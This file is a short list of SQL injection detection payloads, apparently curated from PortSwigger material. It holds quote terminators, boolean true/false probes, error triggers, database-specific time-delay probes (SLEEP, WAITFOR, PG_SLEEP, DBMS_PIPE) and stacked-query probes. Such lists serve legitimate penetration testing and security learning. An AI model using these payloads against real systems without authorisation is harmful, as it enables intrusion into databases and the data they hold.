# ─────────────────────────────────────────────
# DETECTION PAYLOADS — universal SQLi probes
# Run these first regardless of DB or technique
# Source: PortSwigger, manual curation
# ─────────────────────────────────────────────

# --- Basic string terminators ---
'
''
`
')
'))
'--
'-- -
'#
"
"--
"-- -
"#

# --- Boolean probes (check if response changes) ---
' AND '1'='1
' AND '1'='2
' OR '1'='1
' OR '1'='2
1 AND 1=1
1 AND 1=2
1' AND 1=1--
1' AND 1=2--

# --- Generic error triggers ---
'||'
'+'

# --- Time probes (DB-specific — try each, only one will work per target) ---
' AND SLEEP(3)--
'; WAITFOR DELAY '0:0:3'--
' OR PG_SLEEP(3)--
'||(SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(65)||CHR(65),3) FROM DUAL)||'

# --- Stacked query probes ---
'; SELECT 1--
'; SELECT SLEEP(3)--
'; WAITFOR DELAY '0:0:3'; --
